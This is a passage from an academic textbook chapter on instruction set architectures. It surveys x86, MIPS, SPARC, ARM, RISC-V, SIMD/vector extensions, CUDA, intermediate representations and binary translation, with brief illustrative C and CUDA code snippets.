Since registers were 8 or 16 bits long, a Load or Store instruction could access only a window of 2^16 = 64 Kbytes, while the maximum allowed physical memory size was limited to a megabyte (20 bits). A task running on that processor could access up to four segments of 64 KB each, and the rest of the memory could be used via (1) multitask software or (2) manipulation of the segment registers.
The complex instruction set of the X86 architecture allows each instruction to be quite expressive; Table 2 lists some of the mathematical operations it supports (please note that the 8088 and 8086 did not have direct support for floating-point operations). Table 3 shows all the different addressing modes of an ADD instruction, followed by the impact of the addressing modes on the execution time of the operation. So far, we have focused on a subset of a few basic instructions of the X86 architecture, but the "basic" X86 ISA contains more than 100 instructions; each can be 1–6 bytes long, and the execution time can vary from a single cycle to hundreds of clock cycles.
As a result, the code generated by the compiler consumed a relatively small area (address space), since each instruction was quite expressive. This helped reduce the communication needs between the memory and the execution units, but the overall implementation of the system (hardware) was quite complex. As a result, the operating clock was relatively slow, and many bugs were discovered during the product's lifetime.
IA32 Architectures
When Intel expanded its architecture to 32 bits, it also added quite a few new technologies.
Figure 5 depicts the internal state of the IA32 core. The CISC architecture allows companies (e.g., Intel and AMD) to extend and adjust the ISA in a relatively straightforward manner, since existing code can continue running on the new generation of the core with performance that is, in most cases, at least the same as before. But using the same decoding scheme to preserve compatibility caused some performance penalties, since the efficient, short decode schemes were already taken by instructions that were less frequently used by newer applications. On the other hand, the development time of a new generation of processors was significantly reduced, since the designers could reuse significant subsystems of the old generation as part of the new design.
x86-64 Registers
In order to support compatibility, the x86-64 architecture supports registers of all the previous lengths (Fig. 6):
• 64-bit general-purpose registers (RAX, RBX, RCX, RDX, RSI, RDI, RSP, RBP,
or R8-R15)
• 32-bit general-purpose registers (EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP,
or R8D-R15D)
• 16-bit general-purpose registers (AX, BX, CX, DX, SI, DI, SP, BP, or R8W-
R15W)
• 8-bit general-purpose registers: AL, BL, CL, DL, SIL, DIL, SPL, BPL, and R8B-R15B (available using the REX prefix)
• MMX registers (MM0 through MM7)
• XMM registers (XMM0 through XMM15) and the MXCSR register
• Control registers (CR0, CR2, CR3, CR4, and CR8) and system table pointer
registers (GDTR, LDTR, IDTR, and task register)
• Debug registers (DR0, DR1, DR2, DR3, DR6, and DR7)
• MSR registers
• RDX:RAX register pair representing a 128-bit operand
Please note that some of the registers are mapped onto the same area (see Fig. 6)
to save power, area, and time when the system needs to store or restore the content
of a process.
The above list is only partial, and many more extensions have been proposed. For example, SGX (Software Guard Extensions) was proposed to allow the creation and protection of enclaves (secure memory regions); other extensions add ISA support for machine learning algorithms, and more.
Some of these technologies require the introduction of new data types; for example, the BF16 (bfloat16) format consists of 1 sign bit, an 8-bit exponent, and a 7-bit mantissa.
Recent X86-64 architectures add support for new short floating-point formats to provide efficient support for machine learning algorithms (Table 4). We may assume that the next generations of Intel processors will extend the notion of vectors to multidimensional matrix operations.
Summary
CISC architectures, in general, and Intel architectures in particular, were developed
under the assumption that software compatibility is the most crucial feature the
architecture needs to preserve, even at the cost of extra complexity, since it can
significantly help to achieve better performance and to provide significant benefits
to the end user. This approach enables an easy feature migration path and naturally
supports backward compatibility. However, the CISC architecture presents a few
inherent challenges:
• The critical path determines frequency, and accelerating all stages of a complex
system is costly.
• Suboptimal decoding scheme.
• The architecture is error-prone.
• Difficult to decode multiple instructions in parallel.
• Advanced addressing modes, such as supporting arithmetic operations between
memory and registers, make optimizations very difficult.
• Power is a major issue in modern design, and complexity affects power consump-
tion.
Intel solves (or at least eases) many of these issues at the microarchitecture level; all Intel architectures, starting with the P6, use out-of-order execution and micro-operations as the internal assembly code of the machine. We will extend the discussion on how the microarchitecture helps in the next chapter.
RISC: Reduced Instruction Set Computer
The RISC approach builds on several observations:
• Amdahl's law (Amdahl 2013) calls for accelerating the part we use the most (see Eq. (1)).
• At runtime, only a handful of instructions are frequently executed (Hennessy and Patterson 2007; Patterson et al. 1979).
• A simple design allows an increase in frequency.
• A Load/Store architecture allows:
– Increasing the number of registers, which in return reduces the overall number of memory operations, considered the main bottleneck of computer systems.
– Using three operands per instruction, which enables many optimizations that improve execution time.
– A large register window, which enables an efficient exchange of parameters when calling a procedure and returning to the caller.
62 A. Mendelson
IBM Research was the first to experiment with this new approach, with its experimental processor, the IBM 801 (Radin 1983). The idea yielded a few competing research projects, for example, the SPARC processor (Garner 1988), the RISC-I processor, and the MIPS architecture (Kane and Heinrich 1992). We start this section with a discussion of the SPARC and MIPS architectures before describing the ARM family of RISC processors (Furber 2000).
MIPS
The MIPS architecture started as an academic project at Stanford University (Hennessy et al. 1982), and soon after, a company was established to commercialize it (Kane and Heinrich 1992). The processor had different generations, but in this chapter we mainly focus on the first generation, termed MIPS-I, since most of the concepts of the entire family already appear there.
The MIPS-I processor was a Load/Store architecture that presented a simple design to increase the frequency (relative to CISC at that time) and allowed the creation of many new compiler optimizations. The MIPS processor has 32 registers, 32 bits each; some have a specific goal, for example, R0 is hardwired to zero, and register R31 is used as a link register. The machine assumes an in-order, Von Neumann architecture but allows multiplication and division instructions to be executed asynchronously as long as dependencies are maintained.
The program counter is 32 bits long, but the lower 2 bits are wired to "0" since all MIPS-I instructions are 4 bytes long and aligned to word boundaries. Simplicity was the main target of all RISC architectures, including MIPS, so instructions are always 4 bytes long and have one of three internal formats: R (Register), I (Immediate), and J (Jump), as depicted in Fig. 7.
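As an illustration of how the fixed 32-bit formats simplify decoding, the hedged C sketch below extracts the fields of an R-format instruction; the field boundaries follow Fig. 7, while the macro names are my own:

#include <stdint.h>
#include <stdio.h>

#define OPCODE(i) (((i) >> 26) & 0x3F)  /* bits 31..26 */
#define RS(i)     (((i) >> 21) & 0x1F)  /* bits 25..21 */
#define RT(i)     (((i) >> 16) & 0x1F)  /* bits 20..16 */
#define RD(i)     (((i) >> 11) & 0x1F)  /* bits 15..11 */
#define SHAMT(i)  (((i) >>  6) & 0x1F)  /* bits 10..6  */
#define FUNCT(i)  ((i) & 0x3F)          /* bits 5..0   */

int main(void) {
    uint32_t insn = 0x014B4820;  /* encodes: add $t1, $t2, $t3 */
    printf("op=%u rs=%u rt=%u rd=%u shamt=%u funct=%u\n",
           OPCODE(insn), RS(insn), RT(insn), RD(insn),
           SHAMT(insn), FUNCT(insn));
    return 0;
}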
To improve performance, MIPS introduced the notion of a branch delay slot, which gives the compiler the ability to help the microarchitecture. We will extend the discussion on that in section "Delayed Branch in MIPS".
MIPS-I was the first RISC architecture to allow complex instructions, such as floating-point operations, to use multiple cycles to complete an operation. To support FP operations, MIPS added 32 floating-point registers; adjacent registers could be paired to support double-precision numbers and double-precision arithmetic operations, so the file could also be used as 16 double-precision FP registers.
SPARC ISA
SPARC (Garner 1988) is another RISC core, originally developed in Berkeley and supported by Sun. It also had a simple instruction format (although more complicated than MIPS), as shown in Fig. 8. Although SPARC was influenced by other RISC architectures, it introduced quite a few unique features, such as a new use of the register window, support for coprocessors, and more.
SPARC presents a new use of register windows: a "scratchpad" of fast memory (SRAM) used as a cyclic buffer of registers. In SPARC, the register window could contain 40–520 registers, organized as eight global registers and between 2 and 32 overlapping register banks. At any given time, a process can access the eight global registers and a dedicated set of 32 registers managed as a sliding window out of the scratchpad.
To manage the register window, SPARC added a special register, the CWP (current window pointer), which was also added to the process's context (meaning it is saved and restored during a context switch). The CWP points to a contiguous area in the scratchpad that serves as the currently active register region of a process (see Fig. 9). The active register window is divided into three subregions: eight registers are treated as "IN" registers, eight as "Local" registers, and the last set of eight as "OUT" registers. When a caller calls a procedure (which can be itself, in the case of a recursive call), the sliding window is pushed down so that the new CWP points to the region that used to be the OUT region (now considered IN), and a new memory region is allocated within the scratchpad for the Local and OUT register regions. The old CWP is restored at return time, and the overlapped register region can be used for returning parameters.
The overlap between the OUT registers of the caller and the IN registers of the callee enables a very efficient mechanism to transfer parameters and allows a fast implementation of procedure calls. The downside of this mechanism is that the hardware does not automatically protect the register window against overflow, for example, in case of deep recursion; it is up to the process to manage it.
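The overlap can be modeled in a few lines of C; the sketch below is a toy model under assumed sizes (8 windows, 8-register IN/LOCAL/OUT regions), not the actual SPARC mechanism:

#include <stdio.h>

#define NWIN 8
#define SCRATCH (NWIN * 16)  /* 16 fresh registers (LOCAL+OUT) per window */

static int scratch[SCRATCH];
static int cwp = 0;          /* current window pointer */

/* Window w's IN region starts at w*16; its OUT region starts at (w+1)*16,
   which is exactly the IN region of window w+1: the regions overlap. */
int *in_regs(int w)  { return &scratch[(w * 16) % SCRATCH]; }
int *out_regs(int w) { return &scratch[((w + 1) * 16) % SCRATCH]; }

int main(void) {
    out_regs(cwp)[0] = 42;   /* caller writes a parameter into OUT0 */
    cwp++;                   /* SAVE: slide the window on a call */
    printf("callee reads IN0 = %d\n", in_regs(cwp)[0]);  /* same cell: 42 */
    cwp--;                   /* RESTORE on return */
    return 0;
}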
SPARC also presented a new method to support coprocessors. Although coprocessors were optional in SPARC, the ISA allowed considering them part of the machine's general pipeline and managing them accordingly.
The instruction set supports a single, implementation-dependent coprocessor (see Table 5). The coprocessor could have an independent set of registers but must have a state register and a condition register. All coprocessor data and control/status registers could be accessed via two special load/store coprocessor instructions that use one of the formats presented in Table 5.
The ability to integrate accelerators and user-defined instructions as part of the ISA of a RISC architecture helps extend the RISC model but requires a more complicated design and vast support from compilers, libraries, and other software tools.
registers, R0-R7, the Program Counter (PC), the stack pointer register (SP), the link register (LR), and the processor state control register (CPSR). The system also uses some hidden registers, such as the SPSR, which keeps the saved state of the system to allow fast interrupts; some versions add performance counters and more.
Thumb has two versions, Thumb-I and Thumb-II. Thumb-I mainly provides 2-byte instruction encodings, while Thumb-II extends it with additional 4-byte encodings, so that Thumb-II supports a hybrid instruction length (2 and 4 bytes).
ARM7-32 Bits
ARM7-32 bits represents a family of chips, each aimed at a different market with different optimization points. Thus, most of the differences appear at the system level (and not at the level of the ISA). The family is divided into mainly three categories (AKA profiles): the A (application), R (real-time), and M (microcontroller) profiles. Since this chapter mainly focuses on the ISA of ARM7, we will ignore the system-level differences among these classes. The different instruction formats of ARM7 appear in Table 7.
In order to allow better control over power consumption, ARM7 adds predication bits to control many of its instructions. Predication has proven to be an efficient mechanism for the compiler to indicate to the architecture whether an instruction needs to be executed. When predication is used, the execution of an instruction takes place only if the condition encoded in these bits holds. This technique is widely used in modern parallel architectures such as CUDA.
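Conceptually, predication replaces a short forward branch with instructions that execute (or are squashed) based on condition flags. In C terms, the pattern below is the classic candidate; with predication, a compiler can emit a conditionally executed move instead of a branch (an illustrative sketch, not actual compiler output):

#include <stdio.h>

int max_val(int a, int b) {
    int r = b;
    if (a > b)      /* with predication: a conditionally executed move   */
        r = a;      /* (e.g., ARM can encode this as a single MOVGT)     */
    return r;
}

int main(void) {
    printf("%d\n", max_val(3, 7));  /* prints 7 */
    return 0;
}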
Please note that the basic ARM7 ISA does not support floating-point or SIMD operations. Instead, these operations used to be executed on coprocessors, taking advantage of the coprocessor interface.
The two instruction sets (Thumb and 32-bit) can coexist; the architecture maps the two architectural states so that they overlap, as depicted in Fig. 10. The ARM architecture does not support a hybrid mode where instructions from the two ISAs can interleave; the system is either in 16-bit mode or in 32-bit mode. In order to switch between the modes, a special instruction, BX, was added. If used with the state bit (bit 0) set, the system switches to Thumb (16-bit) mode. A transition to the Thumb state also occurs automatically on return from an exception (IRQ, FIQ, UNDEF, ABORT, SWI, etc.), assuming the exception happened while the processor was in the Thumb state.
AA64 Architecture
The AARCH64 (Pyeatt and Ughetta 2019) is a new ISA that ARM presented to support the new generation of 64-bit architectures. This subsection does not intend to serve as a tutorial on the AARCH64 architecture; it mainly discusses the scalability issues of different architectures belonging to the same family of processors.
Table 7 ARM 32-bit instruction set format
31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0
Data Processing/ Cond 0 0 I Opcode S Rn Rd Operand 2
PSR Transfer
Multiply Cond 0 0 0 0 0 0 A S Rd Rn Rs 1 0 0 1 Rm
Multiply Long Cond 0 0 0 0 1 U A S RdHi RdLo Rn 1 0 0 1 Rm
Single Data Swap Cond 0 0 0 1 0 B 0 0 Rn Rd 0 0 0 0 1 0 0 1 Rm
Branch and Cond 0 0 0 1 0 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 0 0 0 1 Rn
Exchange
Halfword Data Cond 0 0 0 P U 0 W L Rn Rd 0 0 0 0 1 S H 1 Rm
Transfer: register
offset
Halfword Data Cond 0 0 0 P U 1 W L Rn Rd Offset 1 S H 1 Offset
Transfer: immediate
offset
Single Data Transfer Cond 0 1 I P U B W L Rn Rd Offset
Undefined Cond 0 1 1 1
Block Data Transfer Cond 1 0 0 P U S W L Rn Register List
Branch Cond 1 0 1 L Offset
Coprocessor Data Cond 1 1 0 P U N W L Rn CRd CP# Offset
Transfer
Coprocessor Data Cond 1 1 1 0 CP Opc CRn CRd CP# CP 0 CRm
Operation
Coprocessor Cond 1 1 1 0 CP Opc L CRn Rd CP# CP 1 CRm
Register Transfer
Software Interrupt Cond 1 1 1 1 Ignored by processor
(Fig. 10: mapping of the Thumb-state registers onto the ARM-state registers. The Lo registers R0-R7 map directly; the High registers R8-R12 are not directly accessible in Thumb state; SP (R13), LR (R14), PC (R15), CPSR, and SPSR map directly.)
The AARCH64 uses a handful of instruction formats (see Table 8) that help keep the instruction decoding scheme simple but do not allow it to maintain compatibility with previous generations.
When looking at the system-level support of different ARM cores, there are significant differences between chips belonging to different groups; for example, processors in the R series provide faster interrupt support to serve real-time applications. In addition, the definition and the implementation of the TrustZone (security extension) differ between the M series and the A series.
Research comparing the ARM ISA to the X86 ISA (Ark 2017; Akr 2019) did not find fundamental ISA-related differences between these alternatives in terms of performance. But when comparing the power consumption and the design complexity of these alternatives, the use of a fixed-size instruction format has a considerable advantage, mainly when attempting to decode several instructions in parallel. This is one of the major reasons ARM is more popular than Intel in edge and mobile devices.
The RISC-V Approach for ISA
RISC-V is an open ISA that attracts many researchers and industries. To get around the scalability issue, RISC-V came out with a unique approach: it defines a basic ISA that resembles the MIPS architecture, plus a set of extensions, each aiming to meet the needs of a different market segment. As a result, all RISC-V processors must support the common basic ISA but can still be optimized to meet specific goals.
A RISC-V developer can decide which extensions to implement and which are not needed for the specific product or market the core is aiming at. The advantage of this approach is that it allows the core architect to assemble a core that best fits its needs in terms of power, area, and performance with respect to the product's specific requirements. It also allows maintaining compatibility with respect to a specific extension. The downside of this approach is that it creates software incompatibility between different cores; hence, a core and code developed for one market most likely cannot be used as part of another market.
For the reader's benefit, we chose a handful of example extensions out of the larger list of options discussed in the RISC-V committees. The A (atomic-operations) extension, for example, defines read-modify-write instructions such as the following (a C11 mapping appears after the list):
• AMOSWAP.W/D
• AMOADD.W/D
• AMOAND.W/D
• AMOOR.W/D
• AMOXOR.W/D
• AMOMAX[U].W/D
• AMOMIN[U].W/D
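Assuming a RISC-V target that implements the A extension, standard C11 atomics map naturally onto these instructions; the compiler, not this code, decides whether an AMO instruction is actually emitted:

#include <stdatomic.h>
#include <stdio.h>

int main(void) {
    atomic_int counter = 0;
    /* atomic_fetch_add can compile to a single AMOADD.W on such a core. */
    int old = atomic_fetch_add(&counter, 5);
    /* atomic_exchange corresponds to AMOSWAP.W. */
    int prev = atomic_exchange(&counter, 100);
    printf("old=%d prev=%d now=%d\n", old, prev, atomic_load(&counter));
    return 0;
}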
the ISA and handling them as a separate execution pipe, which can be implemented as a separate hardware module.
The F extension assumes a dedicated floating-point register file containing 32 registers, f0-f31, each FLEN bits wide, and a floating-point control and status register, fcsr. FLEN is defined to be 32 in the case of single-precision FP, 64 in the case of double-precision FP, and 128 in the case of quad-precision FP.
The extension defines special instructions to load and store data between memory and the FP register file. The spec also defines basic operations, such as FADD.S, FSUB.S, FMUL.S, and FDIV.S, which perform single-precision floating-point addition, subtraction, multiplication, and division between rs1 and rs2, writing the result to rd. It also defines more sophisticated instructions, such as FMIN.S and FMAX.S, or FSQRT.S, which computes the square root of rs1 and writes the result to rd.
Summary of ISA Selection
The ISA is the layer that connects the software layer and the hardware implementation. In this chapter, we described and discussed three approaches to selecting an ISA. CISC tries to provide the maximum expressive power to each instruction; the RISC approach calls for simplifying the ISA to allow more software optimizations (mainly due to the use of three-operand instructions) and to accelerate the speed of the processor. Finally, the RISC-V approach calls for a standard "basic ISA" with extensions that aim to solve specific needs.
Each of these approaches has its advantages and disadvantages. The use of CISC architecture eases the process of maintaining backward compatibility, at the cost of decoding efficiency and the increasing cost of parallel decoding. On the other hand, using RISC can improve performance and enable simple parallel decoding, but this approach makes backward compatibility very difficult. The RISC-V approach seems to be a good trade-off between RISC and CISC, since it can maintain compatibility (at least for the basic ISA) and achieve good scalability and performance. Still, it causes an inherent SW compatibility challenge between cores that use different extensions, since software that runs on one processor may not be able to run on others.
Vector and SIMD Extensions
as indicated in Fig. 13. SIMD saves extra decoding power and complexity and removes the need to verify data dependencies. SIMD usually works on dedicated vector registers and affects a fixed number of elements; as a result, the instruction code for adding four elements differs from the instruction code that works on eight elements. Vector extensions, on the other hand, usually operate on memory and can have variable sizes. This subsection discusses these two forms of operations on n-dimensional arrays of elements.
SIMD Architectures
SIMD (Single Instruction, Multiple Data) presents a simple way to expose parallel execution to the hardware. SIMD assumes that the SW guarantees that no dependencies exist between the operations. In return, the architecture ensures that all operations are executed in parallel, as indicated by Fig. 14, which shows an addition operation using arrays of four elements.
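The four-element addition of Fig. 14 can be written with SSE intrinsics; a hedged C sketch (it requires an x86 compiler with SSE support, the default on x86-64):

#include <stdio.h>
#include <xmmintrin.h>

int main(void) {
    float a[4] = {1, 2, 3, 4}, b[4] = {10, 20, 30, 40}, c[4];
    __m128 va = _mm_loadu_ps(a);            /* load 4 floats */
    __m128 vb = _mm_loadu_ps(b);
    _mm_storeu_ps(c, _mm_add_ps(va, vb));   /* one SIMD add covers 4 lanes */
    printf("%g %g %g %g\n", c[0], c[1], c[2], c[3]);
    return 0;
}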
Although many architectures adopt SIMD operations, this chapter focuses on Intel's family of SIMD instructions. To support them, the Intel architecture extends the ISA to include vector registers. The different generations of SIMD operations use a different number of elements in each register, as indicated in Fig. 15.
(Fig. 15: element layouts of a 256-bit YMM register: 8 single-precision floats or 4 doubles in FP form; 8 × 32-bit, 16 × 16-bit, or 32 × 8-bit elements in integer form)
MMX
The MMX ISA extension was the first SIMD instruction set that Intel added to its cores (Pentium P5) to support multimedia applications (Peleg and Weiser 1996). MMX defines eight new registers, named MM0 through MM7, each 64 bits wide and able to store two 32-bit integers, four 16-bit integers, or eight 8-bit integers in parallel (see Fig. 15). MMX mainly targeted competition with multimedia acceleration cards, such as the audio cards that were very popular in those days. Thus, MMX supports integer operations only, but the user could use fixed-point math if floating-point operations were needed. Such support is sufficient for general digital signal processing applications and audio-related operations.
To support fast context switches and fast interrupt response times, the MMX registers are aliased onto the existing x87 floating-point unit (FPU) registers. In the event of a context switch, the entire state of the task needs to be saved; by sharing the FP and MMX state, Pentium cores support efficient context-switch and interrupt-service operations.
SSE initially added eight new 128-bit registers, known as XMM0 through XMM7; the x86-64 instruction set added a further eight registers, XMM8 through XMM15. SSE used only a single data type for the XMM registers: four 32-bit single-precision floating-point numbers.
VBROADCASTSS, VBROADCASTSD, VBROADCASTF128: Copy a 32-bit, 64-bit, or 128-bit memory operand to all elements of an XMM or YMM vector register.
VMASKMOVPS, VMASKMOVPD: Conditionally read elements from a SIMD vector memory operand into a destination register.
VPERM2F128: Shuffle the four 128-bit vector elements of two 256-bit source operands into a 256-bit destination operand.
VPSRAVD: Shift right arithmetically; allows variable shifts, where each element is shifted according to the packed input.
The AVX-512 extension is the latest version of the advanced SIMD ISA that Intel has in this family. AVX-512 extends the registers to 512 bits and adds hundreds of new instructions supporting many different options for wide vector operations. The AVX-512 standard comprises multiple possible extensions:
• AVX-512 Foundation (F): presents the EVEX coding scheme to support 512-bit registers and operations. It also defines options for using masks and broadcast parameters, how rounding is performed, which exceptions can occur, and more.
• AVX-512 Conflict Detection Instructions (CD): provides hardware support for conflict detection. It is mainly suggested for enabling more loop optimizations and for supporting transactional-memory-like operations.
• AVX-512 Prefetch Instructions (PF).
AVX-512 was so complicated that Intel decided to drop much of it from its Alder Lake generation of CPUs (Cutress and Frumusanu 2021), but we may expect it to come back in the future.
The XSAVE instruction supports saving and restoring the AMX internal state.
• It consumes a relatively large area but benefits only applications that can take advantage of it; as Amdahl's law indicates (Amdahl 2013), the overall gain from a new feature is limited by how frequently that feature is used. Thus, it may be very beneficial for some applications but a lost opportunity for applications that do not use it, and it is not always clear whether adding such a feature, mainly for general-purpose computers, is worth the overhead.
• SIMD instructions have a fixed size; thus, you need to recompile your code depending on the hardware you use.
• Managing the vector register file is quite complicated.
The SIMD approach Intel took also presents a forward-compatibility issue: a programmer needs to rewrite her application each time the technology changes. As will be indicated when we discuss the solutions taken by CUDA's developers (see section "HW/SW Codesign: The CUDA Approach"), a different approach can ease these issues.
• SIMD performs operations between registers, while vectors can perform the operations directly on memory (at least from the user's perspective). Please note that at the micro-operation level, vector operations are often divided into three pipelined stages:
– Bring data from memory into very long registers. The data can be located in noncontiguous locations in memory; in this case, a gather operation may be needed.
– Perform the math operations (most of the time, SIMD operations are used for that).
– Write the data back to memory (a scatter operation may be needed); a scalar sketch of these three steps appears after this list.
• From the ISA perspective, the same instruction format is used to handle vectors of different sizes. This helps maintain backward compatibility and allows libraries to be agnostic to the length of the vectors.
Please note that most vector machines use large register files, which can be managed as compiler-controlled buffers, to support vectors. This allows the system to hide memory latency and leverage memory bandwidth.
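The following hedged C sketch spells out the three pipelined steps in scalar form; the indices and sizes are illustrative assumptions:

#include <stdio.h>

#define VLEN 4

/* Step 1: gather elements from noncontiguous memory into a "register". */
void gather(const double *mem, const int *idx, double *vreg) {
    for (int i = 0; i < VLEN; i++) vreg[i] = mem[idx[i]];
}

/* Step 3: scatter the results back to the same noncontiguous locations. */
void scatter(double *mem, const int *idx, const double *vreg) {
    for (int i = 0; i < VLEN; i++) mem[idx[i]] = vreg[i];
}

int main(void) {
    double mem[16];
    for (int i = 0; i < 16; i++) mem[i] = i;
    int idx[VLEN] = {0, 5, 9, 14};              /* noncontiguous locations */
    double v[VLEN];
    gather(mem, idx, v);
    for (int i = 0; i < VLEN; i++) v[i] *= 2.0;  /* step 2: the math */
    scatter(mem, idx, v);
    printf("%g %g %g %g\n", mem[0], mem[5], mem[9], mem[14]);
    return 0;
}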
Cross-Layers Optimizations
Background
Delayed Branch in MIPS
(a) Without a delayed branch:
R1 = 10
R2 = 20
R5 = 30
If (R3>0)
Do something1
else
do something else
(b) With two delay slots, where the compiler hoists independent instructions into the slots (they execute regardless of the branch outcome):
R1 = 10
If (R3>0)
R2 = 20 \\ Delay slot #1
R5 = 30 \\ Delay slot #2
Do something1
else
do something else
VLIW Architectures
In the fragment below, the first two operations are independent and can be scheduled in the same very long instruction word, while the third depends on both:
R1 = 10+2
R2 = 20+1
R3 = R1 + R2
HW/SW Codesign: The CUDA Approach
CUDA (Compute Unified Device Architecture) (NVIDIA 2007; Hwu et al. 2022) presented a new approach to how programs and hardware should be developed. The new approach calls for HW/SW codesign that considers the characterization of the domain it targets and adjusts it to the characterization of the GPUs Nvidia builds. As before, this chapter does not intend to cover the entire history of CUDA or to provide a comprehensive list of the features CUDA supports; it aims to focus on CUDA's main contribution to redefining the interfaces between the application, the architecture, and the microarchitecture.
To achieve this goal, Nvidia focused on applications with vast parallelism. As a result, CUDA supports only a limited number of data structures: scalars and 1D, 2D, and 3D arrays in memory. A CUDA program describes the operations that the processor executes as well as the code that the accelerator (GPU) runs (see Fig. 19). In the past, the user had to move data from the CPU's main memory to the GPU's main memory explicitly; today, thanks to the new virtual shared memory technology, the system manages the location of the data automatically and moves it if needed.
element within a block. All threads handling data points belonging to the same block can share information, but threads belonging to different data blocks cannot share data. This SW/HW codesign can be used to simplify the hardware and to enable other mechanisms that otherwise could not be considered.
CUDA presents the notion of two parallelism levels: the grid's partition into independent blocks, as depicted in Fig. 20, serves as the higher level of parallelism. However, the system also has a hardware mechanism capable of collecting independent instructions located at the same IP within a block (but in different threads) into a special warp structure and executing it in an execution unit resembling SIMD. This capability is the lower level of parallelism, and Nvidia calls this execution SIMT mode. NVIDIA distinguishes between SIMD and SIMT modes: under SIMD, the same operation is broadcast to different execution units and performed on different data items. In SIMT (single instruction, multiple threads), multiple threads are executed in lock-step, but a predicate controls each thread, so not all threads may execute the same instruction all the time.
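A minimal CUDA sketch of these two levels appears below: the grid supplies independent blocks, each thread computes one element, and the guard predicate (i < n) illustrates per-thread predication; the array size and launch geometry are illustrative assumptions:

#include <cstdio>

__global__ void vec_add(const float *a, const float *b, float *c, int n) {
    /* Each thread derives its global element index from its block and
       thread coordinates; threads within a block may share data via
       __shared__ memory, threads in different blocks may not. */
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n) c[i] = a[i] + b[i];   /* predicated off for i >= n */
}

int main() {
    const int n = 1 << 20;
    float *a, *b, *c;
    /* Unified (managed) memory: the runtime migrates data as needed. */
    cudaMallocManaged(&a, n * sizeof(float));
    cudaMallocManaged(&b, n * sizeof(float));
    cudaMallocManaged(&c, n * sizeof(float));
    for (int i = 0; i < n; i++) { a[i] = 1.0f; b[i] = 2.0f; }
    vec_add<<<(n + 255) / 256, 256>>>(a, b, c, n);  /* grid of 256-thread blocks */
    cudaDeviceSynchronize();
    printf("c[0] = %f\n", c[0]);
    cudaFree(a); cudaFree(b); cudaFree(c);
    return 0;
}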
Nvidia uses CUDA to target different markets and to support different generations of GPU cards, each of which may need a different characterization of the hardware and the software. To cope with that, (1) Nvidia added the notion of CUDA capabilities to indicate which features are supported (WIKIPEDIA 2022), (2) CUDA uses PTX as an intermediate representation (IR), which is translated to the features and the assembly of the specific device, and (3) different Nvidia graphics cards are not guaranteed to be backward-compatible in terms of power and performance: an application that runs on a newer generation of GPUs is not guaranteed to preserve or improve performance with respect to running the same code on an older architecture.
ISA Agnostic Systems
So far, we have mainly focused on the relations between the ISA and the implementation, as represented by the microarchitecture. In this section, we look at solutions that aim to overcome the limitations an ISA presents.
The Use of Intermediate Representations
Java was one of the first systems to use a virtual machine (Lindholm and Yellin 1996) with an intermediate representation, called bytecode, as the ISA to be compiled and optimized (Albert et al. 2007). Sun Microsystems invented Java and described the language as "write once, run anywhere," meaning that the same intermediate representation (IR) of a code could run on any hardware.
To achieve that, Java source code is compiled for a virtual machine, and each architecture needs to compile or Just-In-Time (JIT) translate the code from the
virtual machine IR into the actual assembly code that can run on the specific hardware. Since architectures differ widely in the number of registers, the ISA, etc., the Java virtual machine was designed not to target any existing architecture. Instead, it uses no registers and adopts a stack-based (reverse Polish) model, meaning all operands are transferred through the stack (Bredlau and Deremer 2001). Java also decided not to allow direct system calls or direct use of any other resources of the actual machine; instead, it provides an interface to communicate with the actual operating system and resources.
Today, the notion of using a virtual machine and an intermediate representation is quite common in many systems, although often for different reasons; a few examples are as follows:
• LLVM (Sarda and Pandey 2015), one of the most commonly used compiler frameworks, uses an IR to represent the results of compiling many different programming languages, so that it can combine modules written in different programming languages.
• Nvidia uses the PTX IR (NVIDIA 2022) to unify all the different GPUs they need to support.
• ONNX (ONNX 2020) is an open specification consisting of three main components: (1) an extensible computation-graph model, (2) standard data types, and (3) built-in operators. ONNX intends to unify the IRs of the different environments that aim to support neural network applications.
• Python (VanRossum and Drake 2010) and other scripting languages use virtual environments and IRs.
Binary Translation
In 2005, Apple decided to change the main CPU of its laptops and desktops from IBM to Intel. This strategic move was enabled by the use of a binary translation SW layer called Rosetta. Recently, Apple decided to make another transition, from Intel-based processors to ARM-based cores; this transition was also supported by a newer version of the binary translation code, Rosetta 2 (Apple 2021; Dalakoti and Chakraborty 2022).
Apple was not the first company to use binary translation; most other companies used it to run multi-ISA software on their architectures. To list a few of them:
• Digital Equipment Corporation built several early binary translation systems. FX!32 (Hookway and Herdeg 1997) aimed to run X86 code on Alpha machines, and the AXP translators aimed at running VAX and MIPS code on the new Alpha processor. Although the commercial success of these systems was limited, they enabled the development of other binary translation systems that proved to be more mature and could achieve better performance.
• Transmeta aimed to run X86 code on top of a VLIW, RISC-based architecture to create a low-power X86 core (Klaiber 2000). The company produced two cores, named Crusoe and Efficeon, but had only limited success.
• The System as a Service (SAS) offerings that cloud providers supply are based on the ability of the host architecture to run code that was compiled for any other ISA (Smith and Nair 2005).
Summary
This chapter described different approaches to developing a new architecture and a new ISA. The chapter shows that commercial considerations, such as compatibility, usage models, low-power cores, and more, determine which ISA best fits the market's needs and will hopefully become commercially successful.
As this chapter indicated, it is extremely important to distinguish between general-purpose computers and dedicated, domain-specific architectures. General-purpose architectures need to take care of scalability, backward compatibility, different types of application optimizations, etc., while domain-specific architectures can rely on the characterization of the application or the market they are currently targeting.
As the last section indicates, the importance of the ISA and of backward compatibility is decreasing over time, since modern processors have enough computing power to spare to minimize the impact of the overhead created by the binary translation phase.
But when looking at domain-specific systems and systems with special needs, such as low power or the use of massive networking and vast physical memory, the ability to adjust the ISA and the potential extensions of the architecture still play a significant role in achieving the goals of the system.
References
Albert E, Arenas P, Genaim S, Puebla G, Zanardini D (2007) Cost analysis of Java bytecode.
Programming Languages and Systems, pp 157–172
AMD (2000) The AMD x86-64 architecture. Retrieved from http://www.x86-64.org/
Amdahl GM (1967) Validity of the single processor approach to achieving large scale computing
capabilities. In: Spring Joint Computer Conference, pp 18–20
Amdahl GM (2013) Computer architecture and Amdahl's law. Computer:38–46
Apple (2021) Rosetta 2 binary translation comprehensive supported instruction set list. Retrieved
from https://developer.apple.com/forums/thread/653902
ARM (1995) ARM7TDMI data sheet. Retrieved from https://www.dwedit.org/files/ARM7TDMI.
pdf
ARM (2021) Introducing NEON development. Retrieved from https://developer.arm.com/
documentation/dht0002/a/Introducing-NEON/What-is-NEON-
